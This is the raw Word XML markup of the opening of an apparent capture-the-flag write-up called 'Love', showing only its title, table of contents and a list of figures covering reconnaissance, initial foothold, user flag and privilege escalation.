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203FA013" w:rsidR="00060C0E" w:rsidRPr="00CB3015" w:rsidRDefault="001A5952" w:rsidP="00060C0E">
      <w:pPr>
        <w:pStyle w:val="Titolo"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Love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4491961"/>
      <w:r w:rsidRPr="00CB3015">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Index</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="409450FB" w14:textId="78FBF6FC" w:rsidR="00EA2EBA" w:rsidRPr="00EA2EBA"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84491961" w:history="1">
        <w:r w:rsidR="00EA2EBA" w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Index</w:t>
        </w:r>
        <w:r w:rsidR="00EA2EBA" w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00EA2EBA" w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00EA2EBA" w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc184491961 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00EA2EBA" w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00EA2EBA" w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00D812ED">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="00EA2EBA" w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14F38D52" w14:textId="797BBE1C" w:rsidR="00EA2EBA" w:rsidRPr="00EA2EBA" w:rsidRDefault="00EA2EBA">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc184491962" w:history="1">
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
          </w:rPr>
          <w:t>List of pictures</w:t>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc184491962 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00D812ED">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E8137FD" w14:textId="7D376C6A" w:rsidR="00EA2EBA" w:rsidRPr="00EA2EBA" w:rsidRDefault="00EA2EBA">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc184491963" w:history="1">
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Disclaimer</w:t>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc184491963 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00D812ED">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E4DBD67" w14:textId="0CC2A5D5" w:rsidR="00EA2EBA" w:rsidRPr="00EA2EBA" w:rsidRDefault="00EA2EBA">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc184491964" w:history="1">
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Reconnaissance</w:t>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc184491964 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00D812ED">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2767DFC0" w14:textId="6CEEBC91" w:rsidR="00EA2EBA" w:rsidRPr="00EA2EBA" w:rsidRDefault="00EA2EBA">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc184491965" w:history="1">
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Initial foothold</w:t>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc184491965 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00D812ED">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56FF9F97" w14:textId="2658C8F2" w:rsidR="00EA2EBA" w:rsidRPr="00EA2EBA" w:rsidRDefault="00EA2EBA">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc184491966" w:history="1">
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>User flag</w:t>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc184491966 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00D812ED">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="279A51B4" w14:textId="20AD2856" w:rsidR="00EA2EBA" w:rsidRPr="00EA2EBA" w:rsidRDefault="00EA2EBA">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc184491967" w:history="1">
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Privilege escalation</w:t>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc184491967 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00D812ED">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="663D24CE" w14:textId="1AC07624" w:rsidR="00EA2EBA" w:rsidRPr="00EA2EBA" w:rsidRDefault="00EA2EBA">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc184491968" w:history="1">
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Personal comments</w:t>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc184491968 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00D812ED">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="52B9D870" w14:textId="45457750" w:rsidR="00EA2EBA" w:rsidRPr="00EA2EBA" w:rsidRDefault="00EA2EBA">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc184491969" w:history="1">
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>References</w:t>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc184491969 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00D812ED">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r w:rsidRPr="00EA2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CFEF614" w14:textId="3EB12637"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84491962"/>
      <w:r w:rsidRPr="00D265A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>List of pictures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="4DD7ED15" w14:textId="4589E243" w:rsidR="00EA2EBA" w:rsidRDefault="00EA2EBA">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4491951" w:history="1">
        <w:r w:rsidRPr="007A242F">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 1 - nMap scan results (part 1)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc184491951 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00D812ED">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FAF0B81" w14:textId="5E2D5BCB" w:rsidR="00EA2EBA" w:rsidRDefault="00EA2EBA">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc184491952" w:history="1">
        <w:r w:rsidRPr="007A242F">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 2 - nMap scan results (part 2)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc184491952 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00D812ED">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="29593BA4" w14:textId="386C1599" w:rsidR="00EA2EBA" w:rsidRDefault="00EA2EBA">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc184491953" w:history="1">
        <w:r w:rsidRPr="007A242F">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 3 - Subdomain and possible username found</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc184491953 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00D812ED">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F51CC15" w14:textId="0723EA04" w:rsidR="00EA2EBA" w:rsidRDefault="00EA2EBA">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc184491954" w:history="1">
        <w:r w:rsidRPr="007A242F">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 4 - Credentials found</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc184491954 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00D812ED">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="600F22BC" w14:textId="201071CE" w:rsidR="00EA2EBA" w:rsidRDefault="00EA2EBA">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc184491955" w:history="1">
        <w:r w:rsidRPr="007A242F">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 5 - Exploit and user flag</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc184491955 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00D812ED">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3FB46FB9" w14:textId="11B208F1" w:rsidR="00EA2EBA" w:rsidRDefault="00EA2EBA">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc184491956" w:history="1">
        <w:r w:rsidRPr="007A242F">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 6 - Info for privilege escalation (using WinPeas)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc184491956 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00D812ED">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
